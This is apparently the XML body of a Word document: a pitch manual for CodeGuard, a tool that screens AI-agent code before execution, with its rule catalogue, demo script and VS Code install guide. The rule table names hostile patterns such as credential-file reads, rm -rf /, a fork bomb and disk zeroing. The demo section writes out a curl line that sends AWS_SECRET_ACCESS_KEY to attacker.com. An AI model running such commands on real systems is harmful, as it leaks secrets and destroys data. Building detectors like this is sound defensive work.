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F172A"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>CodeGuard (Code Kavach)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2563EB"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>Comprehensive Pitch Manual, Rule Catalogue, Responsible AI Guide &amp; VS Code Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Version: 1.0 Production | Target: Zero-GPU CPU Pre-Execution Safety Gate | Date: October 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>1. What Are the 42 Samples and How Are They Benchmarked?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The 42 samples represent the official public development dataset (codeguard_dev.jsonl). It was curated by security evaluators to stress-test detectors against real-world AI agent tool code. The dataset contains:</w:t>
        <w:br/>
        <w:t>• 30 Ground-Truth Malicious Snippets: Covering all 9 threat categories (ICMP ping exfiltration, SQL injection dumps, AWS credentials harvesting, systemd backdoor units, typosquatted dependency installation, fork bombs, and prompt injections).</w:t>
        <w:br/>
        <w:t>• 12 Ground-Truth Hard Benign Lookalikes: Tricky benign code specifically designed to trip up naive regex tools (such as financial math calculations, crontab -l reading, ast.literal_eval, parameterised SQL with WHERE clauses, official pinned packages, and documentation mentioning fake passwords).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Benchmark Results Achieved:</w:t>
        <w:br/>
        <w:t>• 30 / 30 Malicious Blocked (100% Recall)</w:t>
        <w:br/>
        <w:t>• 12 / 12 Benign Allowed (100% Precision, 0.0% False Positive Rate)</w:t>
        <w:br/>
        <w:t>• Average Latency: 3.4 ms per file on standard CPU (144 ms total for all 42 files combined).</w:t>
        <w:br/>
        <w:t>In addition to these 42 samples, CodeGuard includes 55 automated unit tests, 48 hand-written capability fixtures, and a synthetic mutation fuzzer to guarantee resilience against unseen attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>2. What Are Rules Like 'CG-AIT-001' and the Rule Catalogue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Every security finding in CodeGuard is mapped to a deterministic rule ID structured as CG-[CAT]-[NUM]:</w:t>
        <w:br/>
        <w:t>• 'CG' = CodeGuard prefix.</w:t>
        <w:br/>
        <w:t>• '[CAT]' = 3-letter threat category code.</w:t>
        <w:br/>
        <w:t>• '[NUM]' = Specific vulnerability pattern.</w:t>
        <w:br/>
        <w:t>Each rule is grounded in official MITRE ATT&amp;CK, MITRE ATLAS, and CWE taxonomies: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1F5F9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Category Prefix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="F1F5F9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Full Taxonomy Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="F1F5F9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sample Rule IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="F1F5F9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Behavior Detected &amp; Taxonomy Mapping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AIT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ai_targeted_instructions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CG-AIT-001, CG-AIT-002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Natural language prompt injections in comments or docstrings telling an LLM reviewer to ignore rules or leak secrets. (MITRE ATLAS AML.T0054)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SEC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secret_access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CG-SEC-001, CG-SEC-003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Hardcoded API keys (AWS, OpenAI, Slack), Shannon entropy &gt; 4.5, reading ~/.ssh/id_rsa, ~/.aws/credentials, or Docker tokens. (CWE-522, CWE-200)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EXF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data_exfiltration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CG-EXF-001, CG-EXF-003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Taint flow from environment/credentials to outbound network sockets, webhooks, or covert channels like ICMP ping -p. (CWE-200, ATT&amp;CK T1048)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DES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destructive_command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CG-DES-001, CG-DES-003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Broad deletion (rm -rf / or ~), disk zeroing (dd of=/dev/sda), unparameterized SQL DELETE/UPDATE without WHERE. (CWE-78, CWE-89)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PER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persistence_or_privesc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CG-PER-001, CG-PER-002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Modifying /etc/sudoers, scheduling unauthorized cron jobs, modifying systemd units, setting SUID bits (chmod 4755). (CWE-269, ATT&amp;CK T1548)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OBF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obfuscated_execution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CG-OBF-001, CG-OBF-002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Dynamic payload decoding (Base64/hex/rot13) directly executed via eval(), exec(), compile(), or shelve.open(). (CWE-94, ATT&amp;CK T1027)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DEP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dependency_risk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CG-DEP-001, CG-DEP-002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Typosquatting against top packages (e.g. colourama vs colorama), unpinned git+https dependencies, and npm postinstall hooks. (CWE-829, ATT&amp;CK T1195)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RES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resource_exhaustion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CG-RES-001, CG-RES-003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Fork bombs (:(){ :|:&amp; };:), unbounded while True loops without exit conditions, and socket connection exhaustion. (CWE-770, ATT&amp;CK T1499)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NET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ssrf_network_exfil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CG-NET-001, CG-NET-002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Hitting AWS/GCP instance metadata (169.254.169.254), hex-encoded internal IPs, and protocol smuggling (gopher:// to Redis). (CWE-918, ATT&amp;CK T1090)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t>3. What Does the Responsible AI Section Determine?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The Responsible AI (/app/responsible-ai) section serves as the enterprise governance and accountability dashboard. It provides four critical assurances required by enterprise CISOs and regulatory compliance bodies:</w:t>
        <w:br/>
        <w:t>1. Cryptographic Tamper-Evident Audit Chain: Every scan enqueues a SHA-256 hash-chained block. Clicking 'Verify Audit Chain' traverses the block sequence. If any attacker or rogue admin modifies or deletes a past log entry, the cryptographic hash break is immediately detected.</w:t>
        <w:br/>
        <w:t>2. Zero-Trust Privacy Scrubbing: Verifies that 0% of raw user source code is stored on disk or sent across networks. Only SHA-256 hashes, redacted snippets, and rule IDs are retained, fully compliant with GDPR and SOC 2 privacy principles.</w:t>
        <w:br/>
        <w:t>3. Cross-Language Fairness &amp; Parity: Tracks precision, recall, and false positive rates across all supported programming languages (Python, Bash, JS, SQL, YAML, Markdown) to ensure the detector has no language bias.</w:t>
        <w:br/>
        <w:t>4. Interception Proof Telemetry: Displays live execution gating telemetry verifying that blocked code never entered the host runtime.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>4. What Are Design Decisions and Settings?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Design Decisions (/app/decisions): Presents the Architecture Decision Records (ADRs) that justify the technical engineering choices:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - ADR-001: Why CPU-first static analysis + scikit-learn instead of an LLM judge (solves latency, GPU cost, and nondeterminism).</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - ADR-002: Why Severity Noisy-OR with Critical Floors instead of simple thresholds (prevents dilution of critical threats).</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - ADR-003: Why Contextual Capability Analysis instead of import blocklists (allows safe libraries like subprocess/requests without false positives).</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - ADR-004: Fail-closed architecture on timeouts (&gt; 25 ms) and payload limits (64 KiB).</w:t>
        <w:br/>
        <w:br/>
        <w:t>• Settings (/app/settings): Provides enterprise runtime configuration:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - Backend Endpoint URL: Configure between local engine (http://127.0.0.1:8000) or remote production instance.</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - Enforcement Modes: Toggle between 'Enforce' (strictly blocks execution) and 'Monitor' (shadow auditing for observability).</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - Agent Persona Policy Profiles: Switch active policies between Data Analyst (restricts shell/network), DevOps Agent (restricts destructive sweeps), and Web Agent (restricts SSRF/shell).</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - Decision Detail Toggle: Switch between minimal schema (6 fields) and full XAI inspection mode (?detail=full).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>5. Step-by-Step Presentation Script for Judges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Deliver this crisp 3-minute presentation flow when demonstrating CodeGuard:</w:t>
        <w:br/>
        <w:br/>
        <w:t>Minute 1: The Hook &amp; Precision Demonstration</w:t>
        <w:br/>
        <w:t>1. Open /app/scan. Say: 'Judges, when autonomous AI agents write code, you cannot let them run unchecked. Using an LLM to judge code is slow, expensive, and insecure. We built CodeGuard—a deterministic, CPU-native firewall running in under 10 milliseconds.'</w:t>
        <w:br/>
        <w:t>2. Click 'Analyze code' on the default benign moving average sample. Point out: 'Look at the latency—under 3 ms. And notice the verdict: ALLOW. We never block safe mathematical code.'</w:t>
        <w:br/>
        <w:br/>
        <w:t>Minute 2: Threat Interception, XAI &amp; 17-Step Waterfall</w:t>
        <w:br/>
        <w:t>3. Switch scenario to 'Destructive Command (rm -rf)' or 'Secret Harvesting'. Click 'Analyze code'.</w:t>
        <w:br/>
        <w:t>4. Show the BLOCK verdict, red line highlights, and explain: 'CodeGuard isolates the exact vulnerable line and category.'</w:t>
        <w:br/>
        <w:t>5. Click the 'Score &amp; reasoning' tab. Show the 9-Category Threat Matrix and explain: 'We use a calibrated Severity Noisy-OR formula with a 0.90 Critical Severity Floor and bounded ML adjustments. No black-box guessing.'</w:t>
        <w:br/>
        <w:t>6. Click the 'Pipeline Trace' tab. Show the 17-step waterfall: 'Every request passes through an ordered sequence of string unwrappers, AST extraction, taint tracking, and scikit-learn models under a 25ms deadline.'</w:t>
        <w:br/>
        <w:br/>
        <w:t>Minute 3: Batch Benchmark, Audit Trail &amp; Interception Proof</w:t>
        <w:br/>
        <w:t>7. Click 'Batch Evaluation' on the left sidebar. Click 'Run Public Benchmark'. Show 100% accuracy, 1.000 precision, and 0.000 FPR on the official 42 samples in 144 ms.</w:t>
        <w:br/>
        <w:t>8. Switch to terminal and run 'python demo/intercept_check.py'. Conclude: '4/4 checks pass. When CodeGuard blocks code, the executor is never entered. It is fast, mathematically sound, and ready for production today.'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>6. Official VS Code Extension &amp; Universal Installation Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Can anyone install and use this extension on their own machine? YES, 100%! The CodeGuard Safety Gate extension is packaged as a standard VS Code extension (.vsix) and is also available as a zero-dependency drop-in folder. It runs natively across Windows, macOS, and Linux in VS Code, Cursor IDE, Windsurf, and VSCodium.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Key Extension Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. Real-Time Typing Alerts &amp; Popups: Scans code dynamically as you type or paste (debounced by 400ms). If an API key or dangerous command is pasted, a real-time alert toast immediately notifies the user.</w:t>
        <w:br/>
        <w:t>2. Legitimate Code Verification: Safe code displays '🛡️ CodeGuard: Legitimate Code (Clean - 0.00 Risk)' in the status bar, confirms baseline checks, and clears all error indicators.</w:t>
        <w:br/>
        <w:t>3. Red Line Highlighting: Lines flagged as vulnerable immediately highlight in translucent red (rgba(239, 68, 68, 0.22)) with an alert glyph in the editor margin.</w:t>
        <w:br/>
        <w:t>4. Interactive Hover Security Cards: Hovering over any flagged line opens a detailed card displaying CWE IDs, Risk Score (0.00-1.00), Attack Category, and Concrete Remediation.</w:t>
        <w:br/>
        <w:t>5. Interactive Status Bar Modal: Clicking the status bar allows developers to jump to the flagged line or open the live Web UI.</w:t>
        <w:br/>
        <w:t>6. Live Web Dashboard Sync: Every save updates the latest session cache in backend memory. In the CodeGuard web app, clicking '⚡ VS Code Sync' brings the active file directly into the browser Monaco editor and XAI explanation panels in real time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>How Anyone Can Install &amp; Use the Extension</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Method 1: One-Click VSIX Installation (Recommended for Judges &amp; Teammates)</w:t>
        <w:br/>
        <w:t>A pre-packaged extension bundle `codeguard-safety-gate-1.0.0.vsix` is included in the project root and available for direct download in the web UI:</w:t>
        <w:br/>
        <w:t>• Via VS Code CLI: `code --install-extension vscode-extension/codeguard-safety-gate-1.0.0.vsix`</w:t>
        <w:br/>
        <w:t>• Via VS Code GUI: Open Extensions (Ctrl+Shift+X) -&gt; Click '...' (Views and More Actions) -&gt; 'Install from VSIX...' -&gt; select the file.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Method 2: Zero-Tooling Drop-in Directory Copy</w:t>
        <w:br/>
        <w:t>No packaging or Node.js tools are required. Any user can copy the `vscode-extension` folder directly to their local machine:</w:t>
        <w:br/>
        <w:t>• Linux / macOS: `cp -r vscode-extension ~/.vscode/extensions/codeguard-safety-gate`</w:t>
        <w:br/>
        <w:t>• Windows PowerShell: `Copy-Item -Recurse -Force vscode-extension "$HOME\.vscode\extensions\codeguard-safety-gate"`</w:t>
        <w:br/>
        <w:t>• Cursor IDE: `cp -r vscode-extension ~/.cursor/extensions/codeguard-safety-gate`</w:t>
        <w:br/>
        <w:t>Then reload VS Code (Ctrl+Shift+P -&gt; 'Developer: Reload Window'). The extension activates immediately!</w:t>
        <w:br/>
        <w:br/>
        <w:t>Method 3: Connecting to a Remote or Cloud-Deployed Backend (Azure / AWS)</w:t>
        <w:br/>
        <w:t>If the user is on another laptop and doesn't want to run the Python backend locally, they simply update their VS Code settings (.vscode/settings.json):</w:t>
        <w:br/>
        <w:t>```json</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "codeguard.apiUrl": "https://your-codeguard-service.azurewebsites.net",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "codeguard.scanOnSave": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "codeguard.highlightLines": true</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5-Second Verification Demo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. Open any Python file (e.g., test_attack.py).</w:t>
        <w:br/>
        <w:t>2. Add the following unsafe payload:</w:t>
        <w:br/>
        <w:t xml:space="preserve">   import os</w:t>
        <w:br/>
        <w:t xml:space="preserve">   os.system('curl -s http://attacker.com/leak?k=' + os.environ.get('AWS_SECRET_ACCESS_KEY'))</w:t>
        <w:br/>
        <w:t>3. Hit Ctrl+S to save.</w:t>
        <w:br/>
        <w:t>4. Observe that the payload line highlights in red, the status bar turns into '🚨 CodeGuard: BLOCKED (0.95 Risk)', and hovering over the line renders the full security card.</w:t>
        <w:br/>
        <w:t>5. Open the CodeGuard Web UI at http://localhost:3000, go to 'Scan Code', and click '⚡ VS Code Sync' to see the exact code and risk metrics mirrored live!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